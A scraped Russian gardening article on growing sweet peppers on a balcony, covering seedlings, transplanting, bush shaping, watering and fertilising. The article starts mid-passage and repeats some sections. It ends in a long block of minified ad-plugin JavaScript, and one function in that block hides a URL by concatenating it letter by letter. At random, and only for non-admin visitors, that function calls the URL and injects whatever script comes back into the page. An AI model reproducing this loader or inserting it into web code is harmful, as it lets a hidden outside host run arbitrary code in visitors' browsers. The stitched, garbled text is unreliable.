В горшки емкостью 2 л рассада высаживается по одному корешку, а в ящики на расстоянии 30 см один от другого. Теперь высаженные растения на 2-3 дня оставляются на слегка затененном балконе, и им обеспечивается температура воздуха 19-21 C. Более холодный температурный режим будет способствовать образованию черной ножки на ранней стадии развития, что в большинстве случаев приводит к гибели молодых растений. Также на этом этапе выращивания следует поддерживать умеренную влажность почвы, чтобы предотвратить корневую гниль.

Формирование куста


При правильном уходе перец начинает ветвиться, выпуская новые побеги. Быстрый рост растения может негативно сказаться на урожайности, поэтому куст нужно правильно формировать.

Советы по формированию куста болгарского перца:

  • Удаляются все пасынки, появляющиеся в пазухах листьев;
  • Все листья, находящиеся ниже первого разветвления, обрываются;
  • Куст формируется только из двух побегов;
  • Первые цветки удаляются на стадии бутонов;
  • На более слабом ответвлении верхушка прищипывается над первой завязью;
  • За месяц до завершения вегетативного сезона, примерно в середине августа, все верхушки прищипываются, и рост растения останавливается. Благодаря этому уже сформировавшиеся завязи развиваются быстрее, а новые, которые не успеют вызреть, не появляются.

Если на балконе выращиваются высокорослые сорта перцев, для их формирования нужно оставить больше места, а также подвязывать по мере роста. Рядом со стволом втыкается колышек, и к нему мягким жгутом привязываются стебли растения. Подвязывать побеги следует под завязью, чтобы созревающие перцы не оттягивали побеги вниз, и они не сломались под весом набирающих массу плодов.

Уход за перцем

Выращивание перца на балконе имеет свои преимущества, поскольку за грядками можно ухаживать каждый день. Основной уход, после пересадки, заключается в правильном и своевременном поливе и подкормках.

Полив

Болгарский перец очень любит влагу, при ее недостатке стенки плодов получаются тонкими и не сладкими. Так как корневая система находится близко к поверхности почвы, поливать следует дозировано, небольшими порциями. В период цветения и развития завязи под каждый куст выливается около 1 л воды в сутки. Особенно обильный полив проводится в жаркие дни, иногда до 2 л за день.

Удержать влагу в земле поможет мульчирование почвы. В качестве мульчи используется измельченная солома или торф. Так как корень растения расположен у поверхности, рыхления лучше не проводить, или делать их осторожно, чтобы не повредить корешки. Мульчирование — может частично заменить рыхления.

Подкормки

За время вегетационного периода перцы подкармливаются три раза: через неделю после высадки рассады, вначале цветения и при появлении первой завязи. Для подкормок используются комплексные удобрения для овощных культур. Поскольку в стесненном пространстве при дефиците почвы растения могут недополучать полезных элементов, проводятся дополнительные подкормки: в период активного роста в почву вносятся азотные удобрения, а с момента появления завязей добавляются удобрения с содержанием фосфора.

Выращиваемые на балконе перцы практически не повреждаются вредителями, а при правильной подготовке семян и уходе за взрослыми растениями не поражаются болезнями.

На видео показано — какой урожай можно получить у себя дома:

Как вырастить перец на балконе

Сладкий перец – один из самых вкусных овощей, без которого трудно себе представить современную кухню. Его можно кушать сырым, добавлять в различные салаты, соусы, заправки, тушить и запекать, мариновать и фаршировать – в любом виде он сохраняет свой характерный вкус и запах. Но перец – растение теплолюбивое, поэтому и его урожай совпадает с летним сезоном, так что наслаждаться им круглый год могут не все. Если летом его стоимость вполне доступная, то уже с середины осени она становится довольно высокой, что не всем по карману. А ведь так хочется наслаждаться его вкусом на протяжении всего года и при этом не переплачивать. Опытные садоводы и дачники-любители, в распоряжении которых есть теплицы, выращивают перцы круглый год наравне с помидорами, огурцами, редисом и другими овощами. Их опыт может пригодиться и жителям городов, которые решили разбить небольшой огород прямо на своем балконе.

Как вырастить перец на балконе? Сладкий перец – растение капризное и уязвимое, требующее к себе постоянного внимания, но для тех, кто решил заниматься садоводством, это не должно стать проблемой. Если следовать всем советам по уходу, результат в виде богатого урожая не заставит себя долго ждать.

Выбор сорта

Существует немало сортов перца, но не каждый из них подойдет для выращивания в условиях теплиц или балконов, поэтому сначала нужно разобраться в их особенностях и выбрать для себя самый подходящий вариант.

Растим перец на балконе

Основные характеристики перца:

  • цвет: красный, желтый, оранжевый и т.д.;
  • форма: кубическая, удлиненная, изогнутая, овальная, с гранями или без них, в виде конуса, призмы, шара;
  • длина: в пределах 1-30 см;
  • вес: 50-200 грамм.

Наиболее подходящие для домашнего огорода сорта можно поделить на раннеспелые, среднеспелые и среднеранние. К первым относятся:

Сортов действительно много, так что садоводам-любителям есть, из чего выбирать, но каждый из этих сортов имеет свои особенности.

Наиболее просты в выращивании современные гибридные перцы, которые отличаются крупными и сочными плодами.

Выращивание рассады

Перец нельзя сразу высаживать в грунт. Сначала его семена проращиваются в небольших емкостях, и только когда рассада достигнет нужных параметров, ее пересаживают на «большую землю».

Семена нужного сорта покупаются на рынке или в магазине, где можно сразу же получить консультацию по поводу ухода за конкретным растением. Время высадки – конец февраля, так чтобы к лету уже был первый урожай.

Рассада болгарского перца из семян на балконе

Перед засеванием в грунт семена перца сначала проходят процесс обработки. Для этого они помещаются в 1-процентный раствор марганцовки на полчаса, после чего вынимаются и тщательно промываются водой. Чтобы растение лучше росло, семена обрабатываются специальным составом – стимулятором роста, а для защиты от грибка – противогрибковым средством. Эти средства продаются там же, где и семена, так что лучше все покупать вместе.

Обработанные семена высеиваются в отдельные емкости, в качестве которых можно использовать небольшие горшки. Глубина погружения семян в почву – от 6 до 12 мм. В период между посадкой и появлением первых всходов температура в помещении должна составлять от +25 до +30°С. Уже на четвертый день могут появиться первые ростки, что является сигналом для понижения температуры до 18°С. Новый тепловой режим сохраняется приблизительно неделю, что тормозит быстрый рост растения. Затем температура поднимается до +23-28°С.

В качестве подкормки для рассады используется следующий раствор: на 10 л воды берется 30 г калийной соли, 50 г мочевины и 125 г суперфосфата. Раствор можно использовать только после того, как на ростках вырастят минимум 3 листка. После подкормки растение поливается обычной водой.

Особое внимание стоит уделить подсветке рассады. Перец – растение светолюбивое, а на балконе не всегда достаточно солнечного света. Специалисты рекомендуют начинать использовать подсветку, когда на ростках сформируются 2-5 листка, то есть приблизительно в период первой подкормки. Длительность таких «излучений» — 12 часов в день.

Когда на ростках появятся 4 листка, приходит время второй подкормки. Ответственный период в уходе начинается с появления 7-8 листка, когда активно начинают развиваться будущие цветки. От ухода в этот период напрямую зависит качество плодов перца.

В период выращивания рассады в горшочки нужно периодически досыпать земли. За весь период это делается 2 раза.

Закаливание рассады

Закаливание нужно не только людям, но и растениям, тем более тепличным. Рассада перца поддается этой процедуре в период, когда ее ростки уже практически готовы к высадке. За две недели до пересадки горшки с растениями выносятся на улицу, если температура уже достаточно высокая. Вечером они заносятся обратно в помещения, а утром снова выставляются на свежий воздух.

Приблизительно за неделю до пересадки рассада подкармливается калийной солью, а за день – сбрызгивается стимулятором роста. Эти процедуры стимулируют выработку специфических гормонов, отвечающих за защиту растения от болезней и неблагоприятных внешних факторов, что влечет за собой не просто нормальное развитие ростков, но и улучшает плодоношение. Практика показывает, что подобные подпитки увеличивают урожай на 40%, а количество вредных веществ, в том числе и нитратов, сокращает на 50%.

Высадка рассады в грунт

Рассаду перца высаживают в грунт, когда ее ростки имеют не менее 12 листков, в пазухах которых можно различить почки. Высота таких ростков достигает 25 см, сами они имеют крепкий и толстый стебель равномерного зеленого оттенка. Такие показатели обычно имеет рассада, которой не меньше 55 дней со дня посева. Помещение балкона, на котором будет выращиваться перец, должно быть хорошо прогретым с температурой не ниже +15°С. Если балкон утепленный, с этим проблем не возникнет, но если нет – придется ждать наступления тепла.

Рассада перца на балконе своими руками

Перед высадкой грунт подготавливается путем добавления в него удобрений: 40 г/м2 калийных и фосфорных и 30 г/м2 азотных. Свежий навоз в качестве удобрения не подойдет – он может стать причиной опадания листьев и быстрому росту стеблей. Его лучше заменить перегноем или компостом в расчете 1 ведро на квадратный метр.

В зависимости от сорта перца выбирается плотность посадки кустов, чтобы растения не были стеснены в пространстве и могли нормально развиваться.

Для крупных сортов, среди которых и гибриды, расстояние между кустами составляет 35 см, для средних – 25 см, для низкорослых – 15 см.

Перед высадкой в почве делаются лунки и обильно увлажняются в расчете 2 л воды на каждую. В них высаживаются ростки, после почву нужно утрамбовать и замульчировать торфом.

Уход за перцем

Первое, что нужно запомнить, выращивая перцы – они требуют обильного и регулярного полива. В этом отношении они более влаголюбивые чем помидоры. При нехватке влаги на плодах появляются пятна, если же полив отсутствует длительное время, может развиться гниль. Еще один нюанс – поддержание постоянной температуры в помещении, так как перцы чувствительны к резким перепадам и к переохлаждению. По этим причинам они часто выращиваются в закрытом грунте.

Выращивание перцев на балконе

Перец любят не только люди, но и различные вредители-насекомые, такие как паутинный клещ. Даже если признаков его присутствия не было замечено, лучше провести профилактику, распылив карбофос или кельтан. Если же клещ появился, действовать нужно немедленно, иначе можно лишиться всех ростков.

На обычном балконе без обогрева уход за перцем сводится к удалению новых побегов на штамбе и средней части стебля. Новые гибридные сорта отличаются еще более простым уходом – все что требуется, это подвязывание их стеблей. Для этого выбираются два самых крепких стебля, а еще пару оставляются для собирания первых плодов.

Чтобы побеги нормально развивались, еще на стадии появления первых бутонов нужно удалить самые нижние из них, по одному на каждом стебле. Также во время роста периодически удаляются боковые ростки, листья на центральном стебле обрываются до появления первого ответвления. Обязательному удалению подлежат сухие и зараженные листья, а также ветки, на которых нет плодов.

При появлении цветов возникает вопрос их опыления. Поскольку они являются обоеполыми, внешнего вмешательства для этого не требуется. Пыльца с тычинок сама попадает на пестик в пределах одного цветка. В некоторых случаях случается перекрестное опыление одного цветка другим с помощью насекомых или порывов ветра. Именно по этой причине нельзя выращивать рядом сладкий и острый перец, иначе в результате плод сладкого перца будет горчить.

Перец на балконе

Несмотря на то, что перец довольно прихотливый, при желании не составит труда вырастить его самостоятельно. Правильный выбор сорта, тщательный уход, своевременная подкормка на всех этапах роста – и цель будет достигнута. Не такая уж и сложная это задача – сладкий перец на балконе. Выращивание, видео процесса которого позволит наглядно ознакомиться с ним, требует соблюдения множества нюансов. Но все это мелочи в сравнении с полученным в результате урожаем ароматных и сочных плодов, которыми можно наслаждаться круглый год.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};